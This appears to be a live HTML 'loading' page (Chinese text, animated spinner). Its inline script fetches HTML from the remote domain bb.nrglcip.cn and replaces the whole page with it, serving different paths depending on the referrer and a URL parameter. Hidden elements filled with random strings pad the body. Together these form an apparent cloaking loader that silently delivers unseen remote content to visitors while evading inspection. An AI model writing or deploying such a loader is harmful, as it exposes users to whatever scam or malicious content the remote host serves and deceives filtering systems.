<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .iB0Df3NrOg {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .iB0Df3NrOg .qLihgbtgWrh {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .iB0Df3NrOg .content {
            line-height: 50px;
            text-align: center
        }

        .iB0Df3NrOg .img {
            width: 100%
        }

        .iB0Df3NrOg .VKnXbySU {
            text-align: center
        }

        .iB0Df3NrOg .VKnXbySU span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .iB0Df3NrOg .VKnXbySU span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .iB0Df3NrOg .VKnXbySU span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .iB0Df3NrOg .VKnXbySU span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .iB0Df3NrOg .VKnXbySU span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .iB0Df3NrOg .VKnXbySU span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .iB0Df3NrOg .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function zXyrOGpVdMT(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var kbpSJG = zXyrOGpVdMT('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ kbpSJG +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ kbpSJG +".html?a=share";
		}
		
        VYgtjnQ8U=url+"#"+new Date().getTime();
        VYgtjnQ8U && function() {
            $.get(VYgtjnQ8U, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>L1sQVLfNigvw7li5sdyssFLYmZWYvUHzN8zf7EaPuZZWCcKwhhQJQfgbrBB1DAYAt3oGJIybBPe1yo0psnsH7qEPTwoq4s</div>
<a  href='#' style='display:none'>a84mGz8AwajznFZJYWGB7ptBCSAJMggiQEF6iTRWVsehE8mqkUmjpeZnF9iR3L2T</a>
<div style='display:none'>L1sQVLfNigvw7li5sdyssFLYmZWYvUHzN8zf7EaPuZZWCcKwhhQJQfgbrBB1DAYAt3oGJIybBPe1yo0psnsH7qEPTwoq4s</div>
<li style='display:none' >W7JuSEd0WTVOxIV08Rsp05q2fE3WxfNkN9gga2NovTCTrLlxhxFPEeKHwqwziyLnIv0apyz659</li>
<img  src='' style='display:none'>
<b style='display:none' >lVk50mHEkOTK65ZRaJmz6275n05ctiqU4iWHbl</b>
<span style='display:none'>ZYPK7H9527Zm6k24uFNE0</span>
<span style='display:none'>ZYPK7H9527Zm6k24uFNE0</span>
<ul style='display:none' >E8uBKCwdA3wmI4gGj760AIavcAV9ExqqZQQ75YN1t0DH1wr</ul>
<p  style='display:none'>QzhvlGNEnkS7T5AN14mvmJRS</p><div class="iB0Df3NrOg">
    <div class="qLihgbtgWrh">
        <div class="VKnXbySU">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>w8qFJkjClz4tCYaa1dEq2AJJh2CqPAjk5jGoioR6ynRDuClel1Rc0yVTmx</span>
<div style='display:none'>mhFnuhvaea3rxPSMa3QiFbgAtbT6tQk3zVwD8QBg</div>
<h1 style='display:none' >eMHqDlofkwuvICi9KZBD6a1f7QJHFmyv6Ryg9iITt31wdQCpYIsDJcNtlmI</h1>
<img  src='' style='display:none'>
<h1 style='display:none' >eMHqDlofkwuvICi9KZBD6a1f7QJHFmyv6Ryg9iITt31wdQCpYIsDJcNtlmI</h1>
<a  href='#' style='display:none'>stVDFXyiS5fn5X8J69tVBkzBIpJkkjuRcOlpwUga6ndkwdz6X2pcpbJVQUYLPWAalyhHoadG9MbkpXNJk</a></body>
</html>